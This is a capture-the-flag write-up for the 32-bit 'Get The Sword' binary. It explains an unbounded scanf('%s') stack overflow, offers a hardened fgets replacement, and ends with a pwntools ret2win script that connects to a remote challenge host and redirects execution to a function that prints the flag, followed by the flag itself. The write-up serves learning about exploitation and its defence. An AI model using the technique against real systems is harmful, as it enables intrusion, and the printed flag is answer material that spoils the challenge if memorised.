
# Get The Sword

{% file src="/files/oKSea2cMamXIuZvkUlWk" %}

## <mark style="color:red;">Challenge Description</mark>


### <mark style="color:blue;">Basic Binary Enumeration</mark>

We can see that the binary is 32-bit and not stripped, which means the function names are not obfuscated, and that all protections (canary, NX, PIE, RELRO) are off.


Let's open the binary in Ghidra to analyze it and find potential vulnerabilities.

We have four functions of interest:

```c
// Ghidra decompilation of get_sword, with types resolved so it compiles
#include <stdio.h>
#include <stdlib.h>

void printSword(void);
void intro(void);
void getSword(void);

int main(void)
{
  printSword();
  intro();
  return 0;
}

void printSword(void)
{
  puts("      />_________________________________");
  puts("[#####[]_________________________________>");
  puts("      \\>");
  fflush(stdout);
  return;
}

void intro(void)
{
  char local_20[24];   // 24-byte stack buffer

  printf("What do you want ? ?: ");
  fflush(stdout);
  scanf("%s", local_20); // BOF vulnerability: %s has no length limit
  printf("You want, %s\n", local_20);
  return;
}

// win function (never called by main)
void getSword(void)
{
  system("cat flag.txt");
  fflush(stdout);
  return;
}
```

The function `intro` is vulnerable because `scanf("%s")` reads user input into a 24-byte stack buffer without any limit on the number of bytes received, so a longer input overwrites the saved return address.
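For comparison, here is the bounded read that would close this bug; it is an added example written for this writeup, not the challenge's code, and the names `read_request` and `read_request_str` are hypothetical. It keeps the same 24-byte buffer but uses `fgets()` with the buffer size, drains any overflow, and reports whether input was cut.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#define BUF_SZ 24   /* same size as intro()'s 24-byte stack buffer */
/* One bounded read: bytes kept, and whether the input had to be cut. */
struct read_result { size_t len; bool truncated; };

/* Hardened replacement for intro()'s scanf("%s"): fgets() stores at most
 * cap bytes, so the saved return address cannot be overwritten. Leftover
 * input is drained so it cannot bleed into a later read. */
struct read_result read_request(FILE *in, char *buf, size_t cap)
{
    struct read_result r = {0, false};
    if (cap == 0 || fgets(buf, (int)cap, in) == NULL) {
        if (cap) buf[0] = '\0';
        return r;
    }
    r.len = strlen(buf);
    if (r.len > 0 && buf[r.len - 1] == '\n') {
        buf[--r.len] = '\0';              /* whole line fit: drop newline */
    } else {
        int c = fgetc(in);                /* buffer full: anything left? */
        if (c != EOF && c != '\n') {
            r.truncated = true;
            while ((c = fgetc(in)) != EOF && c != '\n')
                ;                         /* discard the overflow bytes */
        }
    }
    return r;
}

/* Helper: feed a constructed request through a temp file, as stdin would. */
struct read_result read_request_str(const char *input, char *buf, size_t cap)
{
    FILE *f = tmpfile();
    if (f == NULL) return (struct read_result){0, false};
    fputs(input, f);
    rewind(f);
    struct read_result r = read_request(f, buf, cap);
    fclose(f);
    return r;
}
int main(void)
{   /* constructed 40-byte request, longer than the 32-byte offset to EIP */
    char buf[BUF_SZ];
    struct read_result r = read_request_str("AAAAAAAAAA" "AAAAAAAAAA"
        "AAAAAAAAAA" "AAAAAAAAAA" "\n", buf, sizeof buf);
    printf("kept %zu bytes, truncated=%d\n", r.len, r.truncated);
    return 0;
}
```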

### <mark style="color:blue;">Offset to EIP</mark>

We can use gdb to find the offset, or read it directly from Ghidra's stack layout.

In Ghidra we can see that the offset from the start of the buffer to the saved EIP is 0x20, which is 32 bytes.


### <mark style="color:blue;">Exploit</mark>

```python
from pwn import *

# Set up pwntools for the correct architecture
exe = './get_sword'
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'info'
#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# io = process(exe)
io = remote('173.255.201.51', 31337)
offset = 32
ret = 0x0804900e  # ret gadget (ropper --file=ret2win --search="ret"); unused here
payload = flat(
    offset * b'A',        # fill the 24-byte buffer and reach the saved EIP
    elf.functions.getSword  # overwrite EIP with the win function
)

io.sendlineafter(b':', payload)

io.interactive()
```


### <mark style="color:blue;">Flag</mark>

```
KCTF{so_you_g0t_the_sw0rd}
```
